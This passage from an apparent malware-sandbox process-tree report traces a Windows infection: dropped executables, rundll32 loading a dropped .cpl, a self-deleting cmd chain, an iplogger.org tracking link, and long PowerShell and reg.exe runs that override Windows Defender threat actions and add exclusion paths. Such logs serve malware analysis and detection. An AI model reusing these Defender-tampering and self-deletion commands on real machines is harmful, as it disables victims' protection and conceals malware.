    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:3344
- - C:\Users\Admin\Pictures\Adobe Films\NROUveYetDLp89YeLjvoyKcP.exe
    "C:\Users\Admin\Pictures\Adobe Films\NROUveYetDLp89YeLjvoyKcP.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:3000
- - C:\Users\Admin\Pictures\Adobe Films\Zh3M5OU4FZcI7PVNDwUeCUKJ.exe
    "C:\Users\Admin\Pictures\Adobe Films\Zh3M5OU4FZcI7PVNDwUeCUKJ.exe"
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Drops file in Program Files directory
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    PID:3220
  - - C:\Windows\SysWOW64\control.exe
      "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
      4⤵
      PID:5888
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
        5⤵
        Loads dropped DLL
        
        PID:5424
      - C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
        6⤵
        
        PID:5456
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
        7⤵
        Loads dropped DLL
        
        PID:4984
- - C:\Users\Admin\Pictures\Adobe Films\PSJX3kTgFrzS6xbKJXjbH2XR.exe
    "C:\Users\Admin\Pictures\Adobe Films\PSJX3kTgFrzS6xbKJXjbH2XR.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2624
- - C:\Users\Admin\Pictures\Adobe Films\UPLs6tY8WjwSKiXVW8fL8JqY.exe
    "C:\Users\Admin\Pictures\Adobe Films\UPLs6tY8WjwSKiXVW8fL8JqY.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2536
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2536 -s 1300
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      PID:3548
- - C:\Users\Admin\Pictures\Adobe Films\9hvXSXrdixXuUYtM4HT7kFel.exe
    "C:\Users\Admin\Pictures\Adobe Films\9hvXSXrdixXuUYtM4HT7kFel.exe"
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Loads dropped DLL
    - Checks processor information in registry
    - Suspicious use of SetWindowsHookEx
    PID:2516
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im 9hvXSXrdixXuUYtM4HT7kFel.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\9hvXSXrdixXuUYtM4HT7kFel.exe" & del C:\ProgramData\*.dll & exit
      4⤵
      PID:3476
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im 9hvXSXrdixXuUYtM4HT7kFel.exe /f
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5008
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        5⤵
        Delays execution with timeout.exe
        
        PID:6120
- - C:\Users\Admin\Pictures\Adobe Films\EJegy7njpw4NcGC4TPkpQFA9.exe
    "C:\Users\Admin\Pictures\Adobe Films\EJegy7njpw4NcGC4TPkpQFA9.exe"
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious use of AdjustPrivilegeToken
    PID:3660
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc YwBtAGQAIAAvAGMAIAB0AGkAbQBlAG8AdQB0ACAAMgAwAA==
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3448
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout 20
        5⤵
        
        PID:4184
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 20
        6⤵
        Delays execution with timeout.exe
        
        PID:4668
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3660 -s 2000
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      PID:4876
- C:\Users\Admin\AppData\Local\Temp\askinstall49.exe
  "C:\Users\Admin\AppData\Local\Temp\askinstall49.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3372
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c taskkill /f /im chrome.exe
    3⤵
    PID:448
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im chrome.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1pbEa7
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:368
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,11823168568097411713,102048783089189035,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
    3⤵
    PID:2864
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,11823168568097411713,102048783089189035,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
    3⤵
    PID:1208
- C:\Users\Admin\AppData\Local\Temp\soft.exe
  "C:\Users\Admin\AppData\Local\Temp\soft.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:1292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffab2de46f8,0x7ffab2de4708,0x7ffab2de4718
1⤵
PID:1216

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1704

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:3188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k wusvcs -p
1⤵
PID:4076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2616 -ip 2616
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4148 -ip 4148
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4140 -ip 4140
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4148 -ip 4148
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4148 -ip 4148
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5804

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4064
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:4684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2536 -ip 2536
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4148 -ip 4148
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5448 -ip 5448
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3660 -ip 3660
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 4148 -ip 4148
1⤵
PID:4208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4148 -ip 4148
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3720

C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\wwLMGvKHJFdcKei\JJujxgo.exe
C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\wwLMGvKHJFdcKei\JJujxgo.exe j1 /site_id 525403 /S
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Drops file in System32 directory
PID:4208
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2472
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1856
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:3344
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5604
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4244
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6068
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4892
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5856
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5620
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1016
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4564
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4388
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4268
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4204
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4960
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4368
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4136
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4684
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4928
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6008
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5704
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5868
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3672
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5680
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1476
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GuXKuCyCeSmjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GuXKuCyCeSmjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bQZEOuyekqRU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bQZEOuyekqRU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lSmWvXKKfqUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lSmWvXKKfqUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uAhcATovcXckvYCnvyR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uAhcATovcXckvYCnvyR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wjTkFrExU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wjTkFrExU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ZvEHJNdJDJxIeVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ZvEHJNdJDJxIeVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HvrIGoRDYaykjTnO\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HvrIGoRDYaykjTnO\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5788
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GuXKuCyCeSmjC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5924
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GuXKuCyCeSmjC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:4436
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GuXKuCyCeSmjC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4412
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bQZEOuyekqRU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3200
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bQZEOuyekqRU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5720
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lSmWvXKKfqUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4952
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lSmWvXKKfqUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5236
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uAhcATovcXckvYCnvyR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4216
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uAhcATovcXckvYCnvyR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wjTkFrExU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4596
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wjTkFrExU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4676
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ZvEHJNdJDJxIeVVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5340
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ZvEHJNdJDJxIeVVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3220
- - C:\Windows\SysWOW64\reg.exe
